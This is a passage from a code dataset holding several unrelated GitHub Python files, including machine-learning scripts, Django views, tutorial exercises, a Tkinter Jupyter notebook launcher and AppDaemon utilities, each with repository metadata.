0.2 + np.random.rand() * 0.6\n params[\"reg_ratio\"] = np.random.rand()*0.0015\n params[\"batch_size\"] = np.random.randint(64, 256)\n params[\"seq_len\"] = np.random.randint(20, 30)\n cfg = LinguisticConfig(**params)\n model = RNN(cfg)\n\n elif args.model_type == \"acoustic-lld\":\n test_features, test_labels, val_features, val_labels, train_features, train_labels = load_acoustic_features_dataset()\n params[\"n_layers\"] = np.random.randint(1, 4)\n params[\"hidden_dim\"] = np.random.randint(10, 100)\n params[\"dropout\"] = 0.5 + np.random.rand() * 0.4\n params[\"dropout2\"] = 0.5 + np.random.rand() * 0.45\n params[\"reg_ratio\"] = np.random.rand()*0.0015\n params[\"batch_size\"] = np.random.randint(26,256)\n params[\"bidirectional\"] = bool(np.random.randint(0, 2))\n cfg = AcousticLLDConfig(**params)\n model = RNN(cfg)\n\n elif args.model_type == \"acoustic-spectrogram\":\n test_features, test_labels, val_features, val_labels, train_features, train_labels = load_spectrogram_dataset()\n params[\"fc_size\"] = np.random.randint(10, 200)\n params[\"dropout\"] = 0.3 + np.random.rand() * 0.6\n cfg = AcousticSpectrogramConfig(**params)\n model = CNN(cfg)\n\n else:\n raise Exception(\"model_type parameter has to be one of [linguistic|acoustic-lld|acoustic-spectrogram]\")\n\n print(\"Subsets sizes: test_features:{}, test_labels:{}, val_features:{}, val_labels:{}, train_features:{}, train_labels:{}\".format(\n test_features.shape[0], test_labels.shape[0], val_features.shape[0], val_labels.shape[0], train_features.shape[0], train_labels.shape[0])\n )\n\n \"\"\"Creating data generators\"\"\"\n test_iterator = BatchIterator(test_features, test_labels)\n train_iterator = BatchIterator(train_features, train_labels, cfg.batch_size)\n validation_iterator = BatchIterator(val_features, val_labels)\n\n train(model, cfg, test_iterator, train_iterator, 
validation_iterator)\n","repo_name":"PiotrSobczak/speech-emotion-recognition","sub_path":"speech_emotion_recognition/run_hyperparameter_tuning.py","file_name":"run_hyperparameter_tuning.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"95"}
+{"seq_id":"19127608084","text":"import requests\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom rest_framework import status\nfrom forms.forms import UploadFileForm\nfrom hydra.utils import get_original_cwd\nfrom app.Microservices import ConfigMicroservice, LoggingMicroservice\n\nconfig_service = ConfigMicroservice()\nlogging_service = LoggingMicroservice()\n\nlogger = logging_service.get_logger(__name__)\nlog_file = f\"{get_original_cwd()}/logs/mednotes.log\"\n\n@login_required\ndef dashboard(request):\n    if request.method == \"POST\":\n        form = UploadFileForm(request.POST, request.FILES)\n        if form.is_valid():\n            audio_file = request.FILES[\"file\"]\n            upload_file_url = f\"{config_service.get_config('upload_service_url')}/api/upload_file/\"\n            response = requests.post(upload_file_url, files={\"file\": audio_file})\n            if response.status_code == status.HTTP_201_CREATED:\n                return redirect(\"success\")\n            else:\n                messages.error(request, \"Error occurred during file upload\")\n                logger.error(\"Error occurred during file upload\")\n    else:\n        form = UploadFileForm()\n\n    return render(request, \"templates/html/dashboard.html\", {\"form\": form})\n\n","repo_name":"redmage123/mednotes","sub_path":"app/microservices/client_connectivity_microservice/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"16929880772","text":"import pandas as pd\nimport numpy as np\n\ndata = {\n    \"Column1\": [1,2,3,4,5],\n    \"Column2\": [10,20,13,45, 25],\n    \"Column3\": [\"abc\", \"bcaa\", \"ade\", \"cba\", \"de\"]\n}\n\ndf = pd.DataFrame(data)\n\nresult = df\n\n'''\nresult = df[\"Column2\"].unique() # prints the distinct values; a repeated value is printed only once.\nresult = df[\"Column2\"].nunique() # prints how many distinct values there are.\nresult = df[\"Column2\"].value_counts() # prints each value together with how often it repeats\n'''\n\ndef kareal(x):\n    return x * x\n\nkareal2 = lambda x: x*x\n\n# result = df[\"Column1\"] * 2\n# result = df[\"Column1\"].apply(kareal) # assign the function to Column1; it runs for every value in that column\n# result = df[\"Column1\"].apply(kareal2) # a lambda can be passed as well\n# result = df[\"Column3\"].apply(len) # prints how many characters each value has.\n\ndf[\"Column4\"] = df[\"Column3\"].apply(len) # writes each value's character count into a new column.
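\n# e.g., df[\"Column3\"].apply(len) on this data evaluates to [3, 4, 3, 3, 2]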
\n\n# result = df.columns\n# result = len(df.columns)\n\n# result = df.index\n# result = len(df.index)\n\n# result = df.info\n\n# result = df.sort_values(\"Column2\") # int values are sorted by magnitude\n# result = df.sort_values(\"Column3\") # str values are sorted alphabetically\n# result = df.sort_values(\"Column3\", ascending = False) # for str, ascending=True sorts alphabetically and False reverses the order\n# # the same applies to int values, forward or reverse\n\n\n\nprint(result)","repo_name":"BerkYxvuz/My_Some_Python_Projects","sub_path":"PANDAS/DF metodları/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"20418756840","text":"def main():\n    gab = []\n    cartao(gab)\n    n = int(input(\"Enter the number of students: \"))\n    for j in range(n):\n        lista = []\n        cartao(lista)\n        acerto = comp(lista, gab)  # capture the number of correct answers returned by comp\n        print(\"Student %d got %d answers right.\" % (j + 1, acerto))\n\ndef cartao(lista):\n    for i in range(30):\n        q = input(\"Enter answer %d of 30: \" % (i + 1))\n        lista.append(q)\n    return lista\n\ndef comp(lista, gab):\n    acerto = 0\n    for i in range(30):\n        if lista[i] == gab[i]:  # compare with the i-th entry of the answer key\n            acerto += 1\n    return acerto\nmain()\n","repo_name":"luizdefranca/Curso-Python-IgnoranciaZero","sub_path":"Aulas Python/Exercícios Extras/ime usp/6. Exercícios com Vetores/6.2 - Número de Acertos na Prova.py","file_name":"6.2 - Número de Acertos na Prova.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"36060232593","text":"from datetime import timedelta\nfrom django.utils import timezone\n\nfrom django.shortcuts import render\n\nfrom exerice2_principal.models import Livre, Etudiant, Emprunteur\n\n\n# a) Return the list of all books in the library.\n\ndef all_livres(request):\n    livres = Livre.objects.all()\n    return render(request, \"livres.html\", {'livres': livres})\n\n\n# b) Display the details of a particular student\n\ndef get_student(request, id):\n    student = Etudiant.objects.all().get(id=id)\n    return render(request, 'etudiant.html', {'etudiant': student})\n\n\n# c) Look up a book by its ISBN\n\ndef get_livre_par_isbn(request, isbn):\n    livre = Livre.objects.all().get(isbn=isbn)\n    return render(request, 'user.html', {'livre': livre})\n\n\n# d) Obtain a loan (this method takes the id of the requested book, checks that the book is available\n# and that the logged-in student's numOuvrage of borrowed books is below 5)\n# NB: date_de_sortie is the date the loan is obtained; date_de_retour is date_de_sortie + 14 days\n\ndef get__emprunt(request, id_livre):\n    livre = Livre.objects.all().get(id=id_livre)\n    etudiant = Etudiant.objects.get(id=request.user.id)\n    if livre.disponible and etudiant.numOuvrage < 5:\n        date_de_sortie = timezone.now().date()\n        date_de_retour = date_de_sortie + timedelta(days=14)\n\n        emprunt = Emprunteur(\n            date_de_sortie=date_de_sortie,\n            date_de_retour=date_de_retour,\n            etudiant=etudiant,\n            livre=livre\n        )\n        emprunt.save()\n        return emprunt\n    else:\n        return None\n\n# question c\n# 1- Add 'django.contrib.auth' to the INSTALLED_APPS list in your settings.py file\n\n# 2- Run the command python manage.py migrate to apply the migrations that create the authentication tables in the database.\n\n# 3- Configure the authentication URLs in your urls.py file\n\n# 4- Configure the authentication settings in your settings.py file. You can specify the default login view and the page to redirect to after login or logout:\n\n# LOGIN_REDIRECT_URL = 'home'\n# LOGOUT_REDIRECT_URL = 'login'\n\n# 5- Use the decorators provided by \"django.contrib.auth.decorators\" ==> \"@login_required\" to protect views that require authentication.
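\n\n# A minimal sketch of step 3 (urls.py), assuming the stock django.contrib.auth views are wanted:\n# from django.urls import path, include\n# urlpatterns = [path('accounts/', include('django.contrib.auth.urls'))]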
\n","repo_name":"YoussefElmoudene/Revision_Exam","sub_path":"exerice2_principal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"6615204761","text":"import logging\nfrom collections import defaultdict\n\nimport torch\nimport numpy as np\nfrom sklearn.metrics import classification_report, SCORERS\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegressionCV\n\nlog = logging.getLogger(__name__)\n\n\nclass DiagnosticClassifier:\n    def __init__(self, dataloader, model, device, feature_size, meta_keys, n_points):\n        self.dataloader = dataloader\n        self.model = model\n        self.meta_keys = meta_keys\n        self.feature_size = feature_size\n        self.n_points = n_points\n        self.device = device\n\n    def build_xy(self):\n        log.info(\"Building X, Y\")\n        X = []\n        Ys = defaultdict(list)\n\n        self.model.eval()\n        with torch.no_grad():\n            print_freq = self.n_points // self.dataloader.batch_size\n            for batch_idx, (x, y, meta) in enumerate(self.dataloader):\n                x = x.to(self.device)\n                x = self.model.get_features(x).detach().cpu().numpy()\n                X.extend(x)\n\n                for key in self.meta_keys:\n                    Ys[key].extend([m[key] for m in meta])\n\n                if batch_idx % print_freq == 0:\n                    log.info(\"\\t{} of {} done\".format(len(X), self.n_points))\n\n                if len(X) >= self.n_points:\n                    break\n\n        X = np.array(X[:self.n_points])\n        for key in Ys:\n            Ys[key] = np.array(Ys[key][:self.n_points])\n
complete\")\n return X, Ys\n\n def run(self):\n X, ys = self.build_xy()\n\n results = {}\n for key in ys:\n y = ys[key]\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2)\n\n log.info(\"{}: Fitting a logistic regression model (CV=5)\".format(key))\n clf = LogisticRegressionCV(scoring=\"f1_micro\", cv=3, max_iter=250)\n clf.fit(X_train, y_train)\n\n train_results = classification_report(\n y_train, clf.predict(X_train), output_dict=True)\n test_results = classification_report(\n y_test, clf.predict(X_test), output_dict=True)\n\n results[key] = {\n \"train\": train_results,\n \"test\": test_results\n }\n\n return results\n","repo_name":"oranguh/rhythmz","sub_path":"models/diag_classifier.py","file_name":"diag_classifier.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11869697566","text":"import platform\nfrom os import environ as env\nimport sys\n\nimport requests\n\n\ndef main(rust_name):\n system_aliases = {\n 'Darwin': 'macosx',\n 'Linux': 'linux',\n 'Windows': 'windows'\n }\n system_name = system_aliases[platform.system()]\n name_fmt = (rust_name, system_name, platform.machine())\n name = \"{0}-{1}-{2}.tar.gz\".format(*name_fmt)\n files = {name: open('./release.tar.gz', 'rb')}\n resp = requests.post(env['NGROK_URL'], files=files)\n assert resp.ok\n\nif __name__ == '__main__':\n rust_name = sys.argv[1]\n main(rust_name)\n","repo_name":"bmcorser/travis-compile","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"19714356265","text":"\"\"\"\nhttps://judge.softuni.org/Contests/Practice/Index/1680#0\n\nДадени са 2*n-на брой числа. Първото и второто формират двойка, третото и четвъртото също и т.н.\nВсяка двойка има стойност – сумата от съставящите я числа. 
\n\npairs_count = int(input())\nprevious_sum = int(input()) + int(input())\nmax_diff = 0\n\nfor _ in range(pairs_count - 1):  # -1 because the first pair is already recorded as previous_sum by the initial input\n    current_sum = int(input()) + int(input())\n    sum_diff = abs(previous_sum - current_sum)\n    if sum_diff > max_diff:\n        max_diff = sum_diff\n\n    previous_sum = current_sum  # overwrite previous_sum inside the loop body\n\nif max_diff == 0:\n    print(f\"Yes, value={previous_sum}\")\nelse:\n    print(f\"No, maxdiff={max_diff}\")\n\n# -----------------------------------------------------\n\n# pairs_count = int(input())\n#\n# curr_pair_sum = 0\n# previous_sum = 0\n# max_diff = 0\n#\n# for i in range(2 * pairs_count):\n#     curr = int(input())\n#     curr_pair_sum += curr\n#\n#     if i % 2 != 0 and i >= 3:\n#         pairs = abs(curr_pair_sum - previous_sum)\n#         if max_diff < pairs:\n#             max_diff = pairs\n#         previous_sum = curr_pair_sum\n#         curr_pair_sum = 0\n#\n#     elif i % 2 != 0 and i >= 1:\n#         previous_sum = curr_pair_sum\n#         curr_pair_sum = 0\n#\n# if max_diff == 0:\n#     print(f\"Yes, value={previous_sum}\")\n# else:\n#     print(f\"No, maxdiff={max_diff}\")\n\n# -----------------------------------------------------\n\n# pairs_count = int(input())\n#\n# curr_pair_sum = 0\n# previous_sum = 0\n# max_diff = 0\n#\n# for i in range(2 * pairs_count):\n#     curr = int(input())\n#     curr_pair_sum += curr\n#\n#     if i % 2 != 0 and i >= 3:\n#         max_diff = max(max_diff, abs(curr_pair_sum - previous_sum))\n#         previous_sum = curr_pair_sum\n#         curr_pair_sum = 0\n#\n#     elif i % 2 != 0 and i >= 1:\n#         previous_sum = curr_pair_sum\n#         curr_pair_sum = 0\n#\n# if max_diff == 0:\n#     print(f\"Yes, value={previous_sum}\")\n# else:\n#     print(f\"No, maxdiff={max_diff}\")","repo_name":"kkirev/SoftUni","sub_path":"Programming Basics/04_more_exercises/equal_pairs.py","file_name":"equal_pairs.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"17918754238","text":"n = int(input())\nw = [0]\nfor i in range(n):\n    w.append(int(input()))\n#print(w)\n\n# DP: solve each subproblem once and never recompute it\ndp = [0]\ndp.append(w[1])  # store the amount of the first wine glass in dp\n#print(dp)\n\nif n > 1:\n    dp.append(w[1] + w[2])  # store the accumulated amount of the first and second glasses\n    #print(dp)\n\n# from the third glass onward a recurrence appears, so code that rule\nfor i in range(3, n + 1):\n    dp.append(max(dp[i - 1], dp[i - 3] + w[i - 1] + w[i], dp[i - 2] + w[i]))  # the dp recurrence from the fourth term on\n    #print(dp)\nprint(dp[n])
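\n# e.g., n=6 with amounts 6 10 13 9 8 1 prints 33 (take 6+10+9+8; the recurrence never allows three in a row)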
\n","repo_name":"wldntls/TIL","sub_path":"algorithm/week 4/BOJ_2156.py","file_name":"BOJ_2156.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"10568643961","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import filedialog\nimport os\nimport re\nimport subprocess\nimport configparser\nimport json\n\n\"\"\"\nThis Python script uses Tkinter to create a GUI for opening Jupyter (IPython) notebooks using different Python environments and working directories.\n\nMade by: Ties de Kok\nContact: T.C.J.dekok@tilburguniversity.edu\nLicense: MIT\nVersion: 0.1.0\n\"\"\"\n\nclass GUI:\n    def __init__(self, rootWindow):\n\n        self._config_dir = os.path.join(os.environ['APPDATA'], 'notebook_opener')\n        self._config_file = os.path.join(self._config_dir, 'config.ini')\n        self.config = configparser.ConfigParser()\n\n        self.check_config_dir()\n        self.config.read(self._config_file)\n\n        self.home = os.path.expanduser(\"~\")\n\n        self.button_notebook = IntVar()\n        self.button_notebook.set(1)\n\n        self.check1 = Checkbutton(rootWindow, text=\"Open notebook\", variable=self.button_notebook, onvalue=1, offvalue=0)\n        self.check1.grid(row=9, column=10, columnspan=2)\n\n        self.label = Label(rootWindow, text='Jupyter (IPython) Notebook Opener')\n        self.label.grid(row=0, column=6, columnspan=6, pady=10)\n\n        self.button1 = Button(rootWindow, text=\"Start\", command=self.enter)\n        self.button1.grid(row=8, column=10, columnspan=2)\n\n        self.button2 = Button(rootWindow, text=\"Browse\", command=self.getDir)\n        self.button2.grid(row=6, column=6)\n\n        self.button3 = Button(rootWindow, text='Add', command=self.add)\n        self.button3.grid(row=9, column=3, pady=5)\n\n        self.button4 = Button(rootWindow, text='Remove', command=self.remove)\n        self.button4.grid(row=9, column=4, pady=5)\n\n        self.button5 = Button(rootWindow, text='Add', command=self.add_1)\n        self.button5.grid(row=9, column=0, pady=5)\n\n        self.button6 = Button(rootWindow, text='Remove', command=self.remove_1)\n        self.button6.grid(row=9, column=1, pady=5)\n\n        self.label1 = Label(rootWindow, text='Python environments')\n        self.label1.grid(row=0, column=0, columnspan=2)\n        self.label2 = Label(rootWindow, text='Saved directories')\n        self.label2.grid(row=0, column=3, columnspan=2)\n\n        self.label_about = Label(rootWindow, text='Made by Ties de Kok | GitHub: https://github.com/TiesdeKok/')\n        self.label_about.grid(row=10, column=0, columnspan=5, pady=5)\n\n        self.listbox = Listbox(rootWindow, width = 30, selectmode=SINGLE)\n        self.listbox.grid(row=1, column=3, columnspan=2, rowspan=8, padx=10)\n        self.listbox.bind('<<ListboxSelect>>', self.onselect)\n\n        self.lbpython = Listbox(rootWindow, width = 30, selectmode=SINGLE)\n        self.lbpython.grid(row=1, column=0, columnspan=2, rowspan=8, padx=10)\n        self.lbpython.bind('<<ListboxSelect>>', self.onselect_1)\n\n        self.text = Entry(rootWindow, width=80, background=\"ivory\")\n        self.text.grid(row=6, column=7, columnspan=5, padx=8)\n\n        self.label_python = Label(rootWindow, text='Current Python selection:')\n        self.label_python.grid(row=8, column=6, columnspan=2)\n        self.label_env = Label(rootWindow, text='No selection.')\n        self.label_env.grid(row=8, column=8, columnspan=2, sticky=W)\n
\n        self.label_description = Label(rootWindow, text = 'After selecting a Python environment and a working directory click Start to launch the notebook. \\n'\n                                       ' It is possible to save the environment and working directory using the Add / Remove buttons.')\n        self.label_description.grid(row=1, column=6, columnspan=6, rowspan=5, ipady=7)\n\n        self.label_error = Label(rootWindow, text = '', foreground='red', font = \"TkDefaultFont 14 bold\")\n        self.label_error.grid(row=9, column=6, columnspan=4)\n\n        self.load_stored()\n\n        rootWindow.bind(\"<Return>\", lambda event: self.enter())\n        rootWindow.wm_title(\"Notebook Opener\")\n\n    def add(self):\n        def process():\n            self.listbox.insert(END, name.get())\n            self.listbox_dict[name.get()] = self.text.get()\n            temp = self.listbox_to_dict(self.listbox_dict, self.listbox)\n            self.config.set('Stored dictionaries', 'dirs', json.dumps(temp))\n            self.update_config()\n            toplevel.destroy()\n\n        toplevel = Toplevel()\n        toplevel.attributes('-topmost', True)\n        toplevel.attributes('-topmost', False)\n        label = Label(toplevel, text='Provide a name:')\n        label.grid(row=0, pady=5)\n        name = Entry(toplevel, width = 30, background='ivory')\n        name.grid(row=1, pady=5, padx=10)\n        name.focus()\n        button = Button(toplevel, text='Submit', command=process)\n        button.grid(row=2, pady=5)\n        toplevel.bind(\"<Return>\", lambda event: process())\n\n    def add_1(self):\n        def process():\n            self.lbpython.insert(END, name.get())\n            self.lbpython_dict[name.get()] = script.get()\n            temp = self.listbox_to_dict(self.lbpython_dict, self.lbpython)\n            self.config.set('Stored dictionaries', 'python_env', json.dumps(temp))\n            self.update_config()\n            toplevel.destroy()\n\n        def getFile():\n            fileName = filedialog.askopenfilename(initialdir=self.home, filetypes=[('Batch script', '*.bat')], title='Select your script file:', parent=toplevel)\n            script.delete(0, 'end')\n            script.insert(INSERT, fileName)\n            name.focus()\n\n        toplevel = Toplevel()\n        toplevel.attributes('-topmost', True)\n        toplevel.attributes('-topmost', False)\n        label = Label(toplevel, text='Provide the script path:')\n        label.grid(row=0, pady=5)\n        script = Entry(toplevel, width = 80, background='ivory')\n        script.grid(row=1, pady=5, padx=10)\n        script.focus()\n        button_1 = Button(toplevel, text='Browse', command=getFile)\n        button_1.grid(row=2, pady=5)\n        label_1 = Label(toplevel, text='Provide a name:')\n        label_1.grid(row=3, pady=5)\n        name = Entry(toplevel, width = 30, background='ivory')\n        name.grid(row=4, pady=5)\n        button = Button(toplevel, text='Submit', command=process)\n        button.grid(row=5, pady=5)\n        toplevel.bind(\"<Return>\", lambda event: process())\n\n    def remove(self):\n        if not len(self.listbox_dict) == 0:\n            index = self.listbox.curselection()[0]\n            self.listbox_dict.pop(self.listbox.get(index))\n            self.listbox.delete(index)\n            temp = self.listbox_to_dict(self.listbox_dict, self.listbox)\n            self.config.set('Stored dictionaries', 'dirs', json.dumps(temp))\n            self.update_config()\n\n    def remove_1(self):\n        if not len(self.lbpython_dict) == 0:\n            if not self.lbpython.get(self.lbpython.curselection()[0]) == 'Default Python':\n                index = self.lbpython.curselection()[0]\n                self.lbpython_dict.pop(self.lbpython.get(index))\n                self.lbpython.delete(index)\n                temp = self.listbox_to_dict(self.lbpython_dict, self.lbpython)\n                self.config.set('Stored dictionaries', 'python_env', json.dumps(temp))\n                self.update_config()\n\n    def enter(self):\n        if self.text.get() == '':\n            work_dir = self.home\n        else:\n            work_dir = self.text.get()\n\n        if not self.check_python() == 'failed':\n            if self.button_notebook.get() == 1:\n                version = self.check_version()\n                if not version == \"failed\":\n
                    if version >= 4:\n                        command = 'cmd.exe /k %s && cd /d %s && jupyter notebook' % (self.current_python, work_dir)\n                    else:\n                        command = 'cmd.exe /k %s && cd /d %s && ipython notebook' % (self.current_python, work_dir)\n                    subprocess.Popen(command, creationflags=subprocess.CREATE_NEW_CONSOLE)\n                    self.label_error.config(text = '')\n                else:\n                    self.label_error.config(text = 'Error: IPython could not be found.')\n            else:\n                command = 'cmd.exe /k %s && cd /d %s' % (self.current_python, work_dir)\n                subprocess.Popen(command, creationflags=subprocess.CREATE_NEW_CONSOLE)\n                self.label_error.config(text = '')\n        else:\n            self.label_error.config(text = 'Error: Python environment not valid.')\n\n    def onselect(self, arg):\n        if not len(self.listbox_dict) == 0:\n            index = self.listbox.curselection()[0]\n            value = self.listbox_dict[self.listbox.get(index)]\n            self.text.delete(0, 'end')\n            self.text.insert(INSERT, value)\n\n    def onselect_1(self, arg):\n        if not len(self.lbpython_dict) == 0:\n            index = self.lbpython.curselection()[0]\n            value = self.lbpython_dict[self.lbpython.get(index)]\n            self.label_env.config(text = self.lbpython.get(index))\n            self.current_python = value\n\n    def getDir(self):\n        dirName = filedialog.askdirectory(initialdir=self.home)\n        self.text.delete(0, 'end')\n        self.text.insert(INSERT, dirName)\n\n    def check_version(self):\n        if self.label_env.cget(\"text\") == 'Default Python':\n            cmd = ['cmd.exe', '/k', 'python', '-c', \"import IPython; print('findme' + IPython.__version__)\"]\n        else:\n            cmd = ['cmd.exe', '/k', self.current_python, '&&', 'python', '-c', \"import IPython; print('findme' + IPython.__version__)\"]\n        p = subprocess.Popen(cmd, creationflags= 0x08000000, stdin=subprocess.PIPE, stdout = subprocess.PIPE)\n        output = ' '.join([x.decode('utf-8') if x != None else \"\" for x in p.communicate()])\n        try:\n            version = int(re.search('(?<=findme).', output).group(0))\n            return version\n        except:\n            return \"failed\"\n\n    def check_python(self):\n        cmd = ['cmd.exe', '/k', self.current_python, '||', 'ECHO', 'statusfailed']\n        p = subprocess.Popen(cmd, creationflags= 0x08000000, stdin=subprocess.PIPE, stdout = subprocess.PIPE)\n        output = p.communicate()[0].decode(\"utf-8\")\n        if re.search('statusfailed', output):\n            return \"failed\"\n        else:\n            return \"success\"\n\n    def check_config_dir(self):\n        if not os.path.exists(self._config_dir):\n            os.makedirs(self._config_dir)\n        if not os.path.isfile(self._config_file):\n            with open(self._config_file, 'w') as configfile:\n                self.config.add_section('Stored dictionaries')\n                self.config.set('Stored dictionaries', 'python_env', '{\"Default Python\": [0, \"ECHO Default\"]}')\n                self.config.set('Stored dictionaries', 'dirs', '{}')\n                self.config.write(configfile)\n\n    def ConfigSectionMap(self, section):\n        dict1 = {}\n        options = self.config.options(section)\n        for option in options:\n            try:\n                dict1[option] = self.config.get(section, option)\n                if dict1[option] == -1:\n                    DebugPrint(\"skip: %s\" % option)\n            except:\n                dict1[option] = None\n        return dict1\n\n    def listbox_to_dict(self, lb_dict, lb):\n        out_dict = {}\n        if len(lb_dict) > 0:\n            for x in range(0, len(lb_dict)):\n                out_dict[lb.get(x)] = x\n            return_dict = {a : (b, c) for a, b, c in zip(list(lb_dict.keys()), list(out_dict.values()), list(lb_dict.values()))}\n            return return_dict\n        else:\n            pass\n\n    def update_config(self):\n        with open(self._config_file, 'w') as configfile:\n            self.config.write(configfile)\n\n    def load_stored(self):\n        temp_env = json.loads(self.ConfigSectionMap(\"Stored dictionaries\")['python_env'])\n        self.lbpython_dict = {x : y[1] for x, y in temp_env.items()}\n        for x, y in 
temp_env.items():\n self.lbpython.insert(y[0], x)\n self.current_python = self.lbpython_dict['Default Python']\n self.label_env.config(text = 'Default Python')\n \n temp_dirs = json.loads(self.ConfigSectionMap(\"Stored dictionaries\")['dirs'])\n if len(temp_dirs) > 0:\n self.listbox_dict = {x : y[1] for x, y in temp_dirs.items()}\n for x, y in temp_dirs.items():\n self.listbox.insert(y[0], x)\n else:\n self.listbox_dict = {} \n\nif __name__ == '__main__':\n rootWindow = Tk()\n gui = GUI(rootWindow)\n rootWindow.mainloop()","repo_name":"TiesdeKok/NotebookOpener","sub_path":"notebook_opener.py","file_name":"notebook_opener.py","file_ext":"py","file_size_in_byte":12826,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"95"} +{"seq_id":"38485921396","text":"import posixpath\nimport os\nimport yaml\nfrom datetime import datetime, timedelta\nfrom operator import itemgetter\n\n\ndef extract_face_predictions(analysis):\n predictions = []\n if analysis:\n try:\n for bucket in analysis:\n if 'api' in bucket and bucket['api'] == 'faces':\n # find the 'faces' api if it exists\n if 'found' in bucket:\n results = bucket['found']\n if 'success' in results and results['success'] and 'predictions' in results:\n # Find the 'predictions' if they exist\n predictions = results['predictions']\n break\n except KeyError as ex:\n print(ex)\n return predictions\n\n\ndef add_field_to_path_if_exists(payload_obj, source_dir, field, prefix=\"\"):\n if prefix and field in payload_obj:\n return posixpath.join(source_dir, prefix, payload_obj[field])\n elif field in payload_obj:\n return posixpath.join(source_dir, payload_obj[field])\n return ''\n\n\ndef does_needle_match_haystack_topic(needle_string, haystack_string):\n # AppDaemon subscriptions only seem to work with specific topics, no wildcards -\n # described in https://buildmedia.readthedocs.org/media/pdf/appdaemon/stable/appdaemon.pdf\n # This parses through all message topics (the \"haystack\"), and returns true if a \"needle\" matches\n # Needles can be of the format: \"BlueIris/+/Status\" or \"BlueIris/alerts/+\" with + being a wildcard\n\n needle = needle_string.split(\"/\")\n haystack = haystack_string.split(\"/\")\n\n # Good solution if equal\n if needle == haystack:\n return True\n if len(needle) < len(haystack):\n return False\n\n # Check all subtopics for a match or wildcard match\n for i in range(len(needle)):\n s_needle = needle[i]\n if i < len(haystack):\n s_haystack = haystack[i]\n else:\n return False\n\n # Handle wildcards\n if s_haystack == \"#\":\n return True\n if not (s_haystack == \"+\" or s_haystack == s_needle):\n return False\n\n # Tried all steps, and nothing broke the pattern, so return true\n return True\n\n\ndef substring_after(s, deliminator): return s.partition(deliminator)[2]\n\n\ndef substring_before(s, deliminator): return s.partition(deliminator)[0]\n\n\ndef get_config_var(field, holder, default_val=None):\n # return an item's value from a dictionary\n return holder[field] if field in holder else default_val\n\n\ndef max_found(events, field):\n max_num = 0\n for event in events:\n if event[field] > max_num:\n max_num = event[field]\n return max_num\n\n\ndef max_in_list_of_ioi(events, field):\n max_previously_seen = 0\n for ev in events:\n seen = 0\n for poi in ev['items_of_interest']:\n if poi['label'] == field:\n seen += 1\n if seen > max_previously_seen:\n max_previously_seen = seen\n return max_previously_seen\n\n\ndef max_found_list(events, field):\n max_num = 0\n for event in events:\n 
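# keep the largest list length seen so far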
\n        if len(event[field]) > max_num:\n            max_num = len(event[field])\n    return max_num\n\n\ndef max_sub_list(events, field, sub_field):\n    max_num = 0\n    for event in events:\n        for f_item in event[field]:\n            if f_item[sub_field] > max_num:\n                max_num = f_item[sub_field]\n    return max_num\n\n\ndef merge_dictionaries(source, destination):\n    # \"\"\"\n    # from: https://stackoverflow.com/questions/20656135/python-deep-merge-dictionary-data\n    #\n    # >>> a = { 'first' : { 'all_rows' : { 'pass' : 'dog', 'number' : '1' } } }\n    # >>> b = { 'first' : { 'all_rows' : { 'fail' : 'cat', 'number' : '5' } } }\n    # >>> merge(b, a) == { 'first' : { 'all_rows' : { 'pass' : 'dog', 'fail' : 'cat', 'number' : '5' } } }\n    # True\n    # \"\"\"\n    for key, value in source.items():\n        if isinstance(value, dict):\n            # get node or create one\n            node = destination.setdefault(key, {})\n            merge_dictionaries(value, node)\n        else:\n            destination[key] = value\n\n    return destination\n\n\ndef load_config_file_node(filename, node, default_val, log):\n    _config_from_file = default_val\n    if os.path.exists(filename):\n        with open(filename, 'r') as conf_file:\n            _yaml_contents = yaml.safe_load(conf_file)\n            if node in _yaml_contents:\n                _config_from_file = _yaml_contents[node]\n            else:\n                log('Error: \"{}\" does not have \"{}\" settings'.format(filename, node))\n    else:\n        log('Error: \"config_file\" set in apps.yaml config, but {} does not seem to exist'.format(filename))\n    return _config_from_file\n\n\ndef clip(val, min_, max_):\n    return min_ if val < min_ else max_ if val > max_ else val\n\n\ndef should_text_be_black_or_white(rgb):\n    yiq = ((rgb[0]*299)+(rgb[1]*587)+(rgb[2]*114))/1000\n    return 'black' if yiq >= 128 else 'white'\n\n\ndef field_1_or_2(arr, field_1, field_2, field_3=None, default=None):\n    if field_1 in arr:\n        return arr[field_1]\n    if field_2 in arr:\n        return arr[field_2]\n    if field_3 and field_3 in arr:\n        return arr[field_3]\n    return default\n\n\ndef get_time_ranges(events, _dtg_format, minutes_padding=3):\n\n    start = None\n    end = None\n\n    for ev in events:\n        # Skip if no time information\n        ev_start = date_time(field_1_or_2(ev, 'start', 'start_time', 'time'), _dtg_format)\n        ev_end = date_time(field_1_or_2(ev, 'end', 'end_time', 'time'), _dtg_format)\n\n        # Find the earliest and latest times\n        if not start or ev_start < 